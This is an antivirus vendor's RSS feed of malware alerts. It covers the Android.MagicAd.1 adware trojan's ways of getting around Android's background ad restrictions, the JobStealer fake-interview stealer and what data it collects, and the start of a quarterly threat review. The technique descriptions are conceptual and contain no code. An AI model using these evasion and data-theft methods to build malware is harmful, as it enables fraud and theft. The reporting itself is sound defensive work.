<?xml version="1.0"?>
<rss version="2.0"><channel><title>Virus alerts</title><link>https://news.drweb.com/news/</link><description>Doctor Web news - Virus alerts</description><image><url>https://st.drweb.com/static/drweb_logo_en.gif</url><link>https://news.drweb.com/news/</link><title>Dr.Web anti-virus</title></image><item><guid>https://news.drweb.com/show/?i=15262&amp;lng=en</guid><title>Android.MagicAd trojan displays ads despite all restrictions</title><link>https://news.drweb.com/show/?i=15262&amp;lng=en&amp;c=9</link><pubDate>Thu, 04 Jun 2026 03:00:00 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Doctor Web’s experts have discovered Android.MagicAd, a trojan that bypasses Android OS restrictions in various ways to display background ads. One of these methods is universal, while the others are designed for devices from specific manufacturers. These include exploiting third-party software and using the system media player.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.MagicAd.1&amp;lng=en"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; was distributed via GetApps, the official app catalog for Xiaomi devices, and was concealed in more than 50 games and programs. They were appearing in the app store for a short period of time—usually for up to a month, after which they would disappear and be replaced by the new ones. It is possible that this way, the threat actors were trying to protect &lt;a href="https://vms.drweb.com/search/?q=Android.MagicAd.1&amp;lng=en"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; from premature detection; all that while maintaining its activity, because once removed from the store, the trojan programs remain on users’ devices and can continue performing malicious activities. Currently, none of the apps we identified as containing &lt;a href="https://vms.drweb.com/search/?q=Android.MagicAd.1&amp;lng=en"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; are available for download in the GetApps catalog; and the developers who were distributing them have stopped adding new apps containing this trojan.&lt;/p&gt;

&lt;p&gt;A study conducted by Doctor Web malware analysts showed that the first versions of &lt;a href="https://vms.drweb.com/search/?q=Android.MagicAd.1&amp;lng=en"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; emerged in 2025, and that in addition to the GetApps catalog, they were also encountered in the Samsung Galaxy Store.&lt;/p&gt;

&lt;div class="img img-two"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/01_Android.MagicAd_store_1.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/01_Android.MagicAd_store_1.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/02_Android.MagicAd_store_2.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/02_Android.MagicAd_store_2.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;i&gt;Examples of games and programs from the GetApps catalog in which Android.MagicAd.1 was concealed. At the time of this news release, these and other trojan modifications were unavailable for download&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;Part of &lt;a href="https://vms.drweb.com/search/?q=Android.MagicAd.1&amp;lng=en"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt;’s malicious functionality is located in dex files hidden in encrypted native libraries, which are stored in the trojan’s file resource directory. While in operation, the trojan decrypts these libraries, and then extracts and runs its components from them. &lt;/p&gt;

&lt;p&gt;Before proceeding to display ads, the trojan performs a number of checks to make sure its environment is safe. For example, it searches for signs that it is running in a virtual machine and verifies whether its installation was organic, whether the infected device’s IP address is in the malware’s black list, etc.&lt;/p&gt;

&lt;p&gt;If &lt;a href="https://vms.drweb.com/search/?q=Android.MagicAd.1&amp;lng=en"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; does not detect suspicious activity, it hides its icon from the apps list in the main screen menu. Next, it creates a notification channel, through which it launches several malicious persistence services necessary for the trojan app to work in the background when its window is closed. After that, using the task scheduler, &lt;a href="https://vms.drweb.com/search/?q=Android.MagicAd.1&amp;lng=en"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; creates a task that periodically restarts services that check how the notification channel is working and restart it, if necessary. In addition, when running on devices with relatively old Android OS versions, the trojan launches a virtual screen so that the system cannot interrupt the work of one of its components.&lt;/p&gt;

&lt;p&gt;To display ads in the background when its window is closed, &lt;a href="https://vms.drweb.com/search/?q=Android.MagicAd.1&amp;lng=en"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; uses a number of techniques selected on the basis of the infected device’s manufacturer. At the same time, these methods are implemented without the explicit request for the system permission &lt;span class="string"&gt;SYSTEM_ALERT_WINDOW&lt;/span&gt;, which allows the app to display itself on top of other programs’ windows.&lt;/p&gt;

&lt;p&gt;Regardless of the technique used, all advertising banners are loaded as a Translucent Activity, which allows the trojan to draw them over the existing windows.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/03_Android.MagicAd_banner1.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/03_Android.MagicAd_banner1.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/04_Android.MagicAd_banner2.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/04_Android.MagicAd_banner2.1.png" alt="#drweb"&gt;
    &lt;/a&gt;

    &lt;a href="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/05_Android.MagicAd_banner3.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/05_Android.MagicAd_banner3.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/06_Android.MagicAd_banner4.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/06_Android.MagicAd_banner4.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p class="text-center"&gt;&lt;i&gt;Examples of ads displayed by Android.MagicAd.1&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;One technique is implemented via Intents addressed to other programs. It allows the trojan to bypass the restrictions of modern Android OS versions, which do not allow programs to launch themselves. Depending on the infected device’s model, &lt;a href="https://vms.drweb.com/search/?q=Android.MagicAd.1&amp;lng=en"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; uses this technique to either display ads itself or directly “force” target apps to show the advertising banners.&lt;/p&gt;

&lt;p&gt;In one variation of this method, the trojan targets the following programs:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;
        Mi Browser on Xiaomi devices;
    &lt;/li&gt;
    &lt;li&gt;
        Miui SystemUI graphical shell on Xiaomi devices; and
    &lt;/li&gt;
    &lt;li&gt;
        Amazon Fire TV Home Screen launcher on Amazon TV devices.
    &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;All of these are system apps on the corresponding devices, so they can process intents even when not launched by the user directly. While they are active and can receive intents, &lt;a href="https://vms.drweb.com/search/?q=Android.MagicAd.1&amp;lng=en"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; can use them to display ads.&lt;/p&gt;

&lt;p&gt;It is worth noting that if Mi Browser is installed on a Xiaomi device as a non-system program, the trojan can also use it to show ads—until the browser window is closed.&lt;/p&gt;

&lt;p&gt;When &lt;a href="https://vms.drweb.com/search/?q=Android.MagicAd.1&amp;lng=en"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; detects Mi Browser on a suitable device, it sends its dex component (detected by Dr.Web as &lt;a href="https://vms.drweb.com/search/?q=Android.MagicAd.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.MagicAd.1.origin&lt;/b&gt;&lt;/a&gt;) a pending intent for launching the advertisement. This dex forms its own intent from it and sends it to the browser, which extracts the initial intent and launches the advertisement corresponding to it.&lt;/p&gt;

&lt;p&gt;The interaction with two other target programs slightly differs, as they are used to call the trojan from the background. First, &lt;a href="https://vms.drweb.com/search/?q=Android.MagicAd.1&amp;lng=en"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; sends its dex component a pending intent for launching the ad; this dex then sends its own intent to the target apps so that they awaken it. If the target app is Miui SystemUI, this program responds by sending its intent to awaken the module. If the target app is Amazon Fire TV Home Screen, this app launches the module directly—using the name of the module’s program packet. Once the &lt;a href="https://vms.drweb.com/search/?q=Android.MagicAd.origin&amp;lng=en"&gt;&lt;b&gt;Android.MagicAd.origin&lt;/b&gt;&lt;/a&gt; module gains control, it launches the advertisement from the pending intent sent by the main malicious program.&lt;/p&gt;

&lt;p&gt;If the trojan fails to display the ad, it tries this method twice more, and if that fails, it tries displaying the advertisement directly, without using pending intents and its malicious dex module.&lt;/p&gt;

&lt;p&gt;Another variant of this method resembles the previous one and is used to exploit apps on Vivo devices. It differs in that advertisements are launched with the help of Android Binder, a system component that facilitates interaction between processes. The trojan targets the following system programs:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;
        iManager;
    &lt;/li&gt;
    &lt;li&gt;
        Phonebook;
    &lt;/li&gt;
    &lt;li&gt;
        Vivo Browser; and
    &lt;/li&gt;
    &lt;li&gt;
        Baidu IME Customized.
    &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.MagicAd.1&amp;lng=en"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; launches these programs via Android Binder by sending it regular intents via the Parcel data container. These programs then launch the &lt;a href="https://vms.drweb.com/search/?q=Android.MagicAd.origin&amp;lng=en"&gt;&lt;b&gt;Android.MagicAd.origin&lt;/b&gt;&lt;/a&gt; trojan component from the background, and it displays the advertisement.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.MagicAd.1&amp;lng=en"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; also has several other methods for displaying ads while running in the background, with using media player being one of them. Unlike the techniques that target specific devices, this method is universal and works on most Android device models from different manufacturers. &lt;a href="https://vms.drweb.com/search/?q=Android.MagicAd.1&amp;lng=en"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; decrypts an audio file from its body and saves it to its work directory. Next, the malware launches an instance of the system media player, sets a minimum volume in it, and links the player with the Android OS global media control system. After that, to launch advertisements, &lt;a href="https://vms.drweb.com/search/?q=Android.MagicAd.1&amp;lng=en"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; enables a broadcast receiver that monitors button clicks in this player. The trojan then uses a special adb command to simulate user behavior by pressing the record button in the player and then instantly closes the player’s window. Pressing the button triggers the system media receiver, which allows &lt;a href="https://vms.drweb.com/search/?q=Android.MagicAd.1&amp;lng=en"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; to take control and launch the ad.&lt;/p&gt;

&lt;p&gt;Dr.Web Security Space for mobile devices reliably detects and removes all known versions of the &lt;a href="https://vms.drweb.com/search/?q=Android.MagicAd.1&amp;lng=en"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; malware, keeping our users well protected from this threat.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Android.MagicAd.1/README.adoc" target="_blank" rel="noopener"&gt;Indicators of compromise&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;More details about &lt;a href="https://vms.drweb.com/search/?q=Android.MagicAd.1&amp;lng=en"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;More details about &lt;a href="https://vms.drweb.com/search/?q=Android.MagicAd.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.MagicAd.1.origin&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.com/show/?i=15253&amp;lng=en</guid><title>Instead of a job—stolen data and money. Trojan stealer targeting macOS and Windows users conceals itself in fake online interview apps</title><link>https://news.drweb.com/show/?i=15253&amp;lng=en&amp;c=9</link><pubDate>Thu, 07 May 2026 14:41:46 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;&lt;strong&gt;Doctor Web’s experts are warning users about the spread of JobStealer, a trojan app that steals confidential information from macOS and Windows computer users. It primarily aims to hijack data from crypto wallets. Fraudsters, under the pretext of conducting online interviews, lure potential victims to malicious websites and ask them to download a video conferencing app. In reality, this software is the JobStealer trojan.&lt;/strong&gt;&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;The attack begins with the threat actors contacting potential victims and offering them a particular job vacancy. They invite users to a job interview and provide them with links to websites for the online meeting “platforms”—supposedly to connect to a video conference. These websites look presentable but are actually fraudulent. The malicious program JobStealer, disguised as an online conferencing app, is downloaded from them. Cybercriminals use different designs for these Internet resources and also change the names of the “software”. Our specialists identified variants called MeetLab, Juseo, Meetix, Carolla, and others. In some cases, the attackers use names of real services, like Webex.&lt;/p&gt;&lt;div class="img img-two-v same-height"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/01_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/01_JobStealer.1.png" alt="#drweb"&gt; &lt;/a&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/02_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/02_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Examples of websites for fake online conferencing services from which JobStealer is downloaded&lt;/i&gt;&lt;/p&gt;&lt;p&gt;To convince users that these platforms are fully functional, scammers create corresponding Telegram channels and social media accounts—for example, on X.&lt;/p&gt;&lt;div class="img img-two-v same-height"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/03_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/03_JobStealer.1.png" alt="#drweb"&gt; &lt;/a&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/04_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/04_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;To disguise the trojan as a legitimate piece of software, threat actors create the appearance of activity on social networks&lt;/i&gt;&lt;/p&gt;&lt;p&gt;To install the app on devices running macOS, visitors to malicious websites are provided with two options:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;copy the bash command listed on the website and run it in the terminal;&lt;/li&gt;&lt;li&gt;download a disk image file in the &lt;span class="string"&gt;.dmg&lt;/span&gt; format and launch it.&lt;/li&gt;&lt;/ul&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/05_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/05_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;The JobStealer trojan is downloaded from malicious websites both in the form of a dmg container and by running a bash command in the terminal&lt;/i&gt;&lt;/p&gt;&lt;p&gt;In the first case, when a command is executed in the terminal, a script is automatically downloaded from the Internet and then executed. This script downloads and runs the JobStealer’s executable file (detected as&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Mac.PWS.JobStealer.1&amp;lng=en"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;).&lt;/p&gt;&lt;p&gt;In the second case, the dmg image offered for download initially contains the abovementioned files. When mounted, it displays instructions on how to “install” the app. These instructions state that the user needs to open the terminal and drag the provided script into its window. In fact, instead of the video conferencing app getting installed, the script will launch the trojan file.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/06_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/06_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;An image with the instructions that are displayed when the disk image file containing the JobStealer trojan is opened&lt;/i&gt;&lt;/p&gt;&lt;p&gt;&lt;a href="https://vms.drweb.com/search/?q=Mac.PWS.JobStealer.1&amp;lng=en"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;&amp;nbsp;is an executable container file in the Fat Mach-O format. It contains binary code for several processor architectures—x64 and arm64. Depending on the infected computer’s platform, when the trojan is launched, the component corresponding to the target processor is automatically initialized.&lt;/p&gt;&lt;p&gt;It should be noted that different versions of&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Mac.PWS.JobStealer.1&amp;lng=en"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;&amp;nbsp;exist. The earlier variants of the malware did not work on Mac computers with the arm64 architecture. They also lacked obfuscation—something the trojan’s creators began to add and strengthen when updating the stealer.&lt;/p&gt;&lt;p&gt;When launched,&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Mac.PWS.JobStealer.1&amp;lng=en"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;&amp;nbsp;displays a phishing window that alerts users about an alleged error in the app’s operation. To “fix” this error, the malicious program asks users to provide their user account password.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/07_JobStealer_app_error.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/07_JobStealer_app_error.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;A phishing window asking for a Mac user account password&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Next,&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Mac.PWS.JobStealer.1&amp;lng=en"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;&amp;nbsp;collects the following data:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;operating system version and computer ID;&lt;/li&gt;&lt;li&gt;data from about 300 crypto wallet browser extensions installed in target browsers based on Chromium (Chrome, Opera, Brave, OperaGX, Vivaldi, Edge, Arc, and CocCoc);&lt;/li&gt;&lt;li&gt;cookie files from these browsers;&lt;/li&gt;&lt;li&gt;passwords and bank card details saved in the browser’s autofill lists;&lt;/li&gt;&lt;li&gt;Telegram messenger files from the directories &lt;span class="string"&gt;/Library/Application Support/Telegram Desktop/tdata&lt;/span&gt; and &lt;span class="string"&gt;/Documents/temp_data/Apps/Telegram&lt;/span&gt;, where session authorization keys, downloaded files, etc., are stored;&lt;/li&gt;&lt;li&gt;user notes from the native macOS Notes application;&lt;/li&gt;&lt;li&gt;evidence that the crypto wallets Ledger Live and Trezor Suite are present in the system.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;This data is packed into a ZIP archive and uploaded to the C2 server.&lt;/p&gt;&lt;p&gt;The malware’s creators have also prepared a version of JobStealer for computers running the Windows operating system. Its functionality is similar to that of the macOS version. In addition, some malicious websites distributing the stealer have dedicated sections for downloading the app for other popular operating systems. However, at this time, our virus analysts have not recorded their distribution. For example, the button for downloading the app for the Linux operating system is either inactive or leads to the Windows version of the trojan. And sections for downloading the app onto devices with iOS and Android inform users that these versions are in development. At the same time, it cannot be ruled out that the attackers will begin distributing variants of this trojan for those platforms in the future.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/08_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/08_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Malicious sites can potentially distribute versions of the JobStealer trojan designed for Linux, iOS, and Android&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Dr.Web Security Space anti-virus products for macOS and Windows reliably detect and delete all known JobStealer malware modifications, keeping our users well protected from this threat. Fraudulent websites distributing the trojan are added to the database of non-recommended and dangerous resources and are also blocked by Dr.Web.&lt;/p&gt;&lt;h3&gt;MITRE ATT&amp;amp;CK®&lt;/h3&gt;&lt;p&gt;We analyzed&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Mac.PWS.JobStealer.1&amp;lng=en"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;&amp;nbsp;using the MITRE ATT&amp;amp;CK® framework, a matrix describing the tactics and techniques that cybercriminals utilize to attack information systems. The following key techniques were identified:&lt;/p&gt;&lt;div class="table-news-secondary"&gt;&lt;figure class="table"&gt;&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;&lt;strong&gt;Stage&lt;/strong&gt;&lt;/th&gt;&lt;th&gt;&lt;strong&gt;Technique&lt;/strong&gt;&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;Execution&lt;/td&gt;&lt;td&gt;&lt;p&gt;User Execution (T1204)&lt;/p&gt;&lt;p&gt;Malicious Copy and Paste (T1204.004)&lt;/p&gt;&lt;p&gt;Malicious File (T1204.002)&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Discovery&lt;/td&gt;&lt;td&gt;File and Directory Discovery (T1083)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Collection&lt;/td&gt;&lt;td&gt;&lt;p&gt;Automated Collection (T1119)&lt;/p&gt;&lt;p&gt;Data from Local System (T1005)&lt;/p&gt;&lt;p&gt;Credentials from Password Stores (T1555)&lt;/p&gt;&lt;p&gt;Keychain (T1555.001)&lt;/p&gt;&lt;p&gt;Credentials from Web Browsers (T1555.003)&lt;/p&gt;&lt;p&gt;Input Capture (T1056)&lt;/p&gt;&lt;p&gt;GUI Input Capture (T1056.002)&lt;/p&gt;&lt;p&gt;Archive Collected Data (T1560)&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Command and Control&lt;/td&gt;&lt;td&gt;Web Service (T1102)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Exfiltration&lt;/td&gt;&lt;td&gt;&lt;p&gt;Automated Exfiltration (T1020)&lt;/p&gt;&lt;p&gt;Exfiltration Over C2 Channel (T1041)&lt;/p&gt;&lt;p&gt;Exfiltration Over Web Service (T1567)&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/div&gt;&lt;p&gt;More details about&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Mac.PWS.JobStealer.1&amp;lng=en"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Mac.PWS.JobStealer.1/README.adoc" target="_blank"&gt;Indicators of compromise&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.com/show/?i=15061&amp;lng=en</guid><title>Doctor Web’s Q3 2025 virus activity review</title><link>https://news.drweb.com/show/?i=15061&amp;lng=en&amp;c=9</link><pubDate>Wed, 01 Oct 2025 06:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;October 1, 2025&lt;/b&gt;&lt;/p&gt;

&lt;section&gt;
    &lt;p&gt;&lt;strong&gt;&lt;newslead&gt;According to statistics collected by the Dr.Web anti-virus, the total number of threats detected in the third quarter of 2025 decreased by 4.23%, compared to the second quarter. The number of unique threats increased by 2.17%. Among the most commonly detected threats were unwanted adware software, ad-displaying trojans, and malicious scripts. Email traffic was dominated by malicious scripts, backdoors, and various trojans, including downloaders, droppers, and password stealers.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;
    &lt;p&gt;Users whose files were affected by encoder trojans had mostly encountered &lt;b&gt;Trojan.Encoder.35534&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Trojan.Encoder.35209&amp;lng=en"&gt;&lt;b&gt;Trojan.Encoder.35209&lt;/b&gt;&lt;/a&gt;, and &lt;b&gt;Trojan.Encoder.35067&lt;/b&gt;.&lt;/p&gt;
    &lt;p&gt;In July, Doctor Web’s experts &lt;a href="https://news.drweb.com/show/?i=15036&amp;lng=en" target="_blank"&gt;informed&lt;/a&gt; users about the &lt;a href="https://vms.drweb.com/search/?q=Trojan.Scavenger&amp;lng=en"&gt;&lt;b&gt;Trojan.Scavenger&lt;/b&gt;&lt;/a&gt; malware family whose trojans are designed to steal cryptocurrency and passwords. Threat actors distributed these trojans under the guise of mods, cheats, and patches for games. This malware was launched using legitimate apps, including through the exploitation of the DLL Search Order Hijacking vulnerabilities in them.&lt;/p&gt;
    &lt;p&gt;In August, our malware analysts &lt;a href="https://news.drweb.com/show/?i=15047&amp;lng=en" target="_blank"&gt;warned&lt;/a&gt; about the spread of &lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.916.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt;, a multifunctional backdoor for mobile devices that was targeting representatives of Russian business. Cybercriminals remotely controlled this malware and used it to steel confidential data and spy on victims.&lt;/p&gt;
    &lt;p&gt;That same month, Doctor Web's anti-virus laboratory &lt;a href="https://news.drweb.com/show/?i=15046&amp;lng=en" target="_blank"&gt;released a study&lt;/a&gt; of a targeted attack committed against a Russian engineering enterprise by the Scaly Wolf hacker group. The threat actors used a variety of malicious instruments, one of the main ones being the Updatar modular backdoor. With its help, the attackers tried to obtain confidential data from infected computers.&lt;/p&gt;
    &lt;p&gt;In Q3 2025, our Internet analysts detected more fake Telegram messenger websites and a number of fraudulent finance-themed online resources. In addition, over the past three months, our specialists have recorded the emergence of dozens of malicious and unwanted apps on Google Play. Among these were &lt;a href="https://vms.drweb.com/search/?q=Android.Joker&amp;lng=en"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; trojans, which subscribe users to paid services, and &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; fake programs.&lt;/p&gt;
    &lt;div class="colorful"&gt;
        &lt;h3&gt;Principal trends in Q3 2025&lt;/h3&gt;
        &lt;ul&gt;
            &lt;li&gt;The number of threats detected on protected devices decreased&lt;/li&gt;
            &lt;li&gt;The number of unique threats attacking users were detected in increased numbers&lt;/li&gt;
            &lt;li&gt;More fake Telegram messenger and fraudulent finance-themed websites emerged&lt;/li&gt;
            &lt;li&gt;Password- and cryptocurrency-stealing &lt;a href="https://vms.drweb.com/search/?q=Trojan.Scavenger&amp;lng=en"&gt;&lt;b&gt;Trojan.Scavenger&lt;/b&gt;&lt;/a&gt; malware was spotted in the wild&lt;/li&gt;
            &lt;li&gt;The backdoor &lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.916.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; was used to spy on Russian business representatives and steal confidential data&lt;/li&gt;
            &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.MobiDash&amp;lng=en"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; ad-displaying trojans became the most widespread threat for Android devices&lt;/li&gt;
            &lt;li&gt;The activity of &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; adware trojans decreased for the second quarter in a row&lt;/li&gt;
            &lt;li&gt;Many threats were detected on Google Play&lt;/li&gt;
        &lt;/ul&gt;
    &lt;/div&gt;
&lt;/section&gt;

&lt;section&gt;
    &lt;h3&gt;According to Doctor Web’s statistics service&lt;/h3&gt;
    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/01_stat_q3_2025_en.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/01_stat_q3_2025_en.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p&gt;The most common threats in Q3 2025:&lt;/p&gt;
    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;b&gt;VBS.KeySender.7&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A malicious script that, in an infinite loop, searches for windows containing the text &lt;span class="string"&gt;mode extensions&lt;/span&gt;, &lt;span class="string"&gt;разработчика&lt;/span&gt;, and &lt;span class="string"&gt;розробника&lt;/span&gt; and sends them an Escape key press event, forcibly closing them.&lt;/dd&gt;
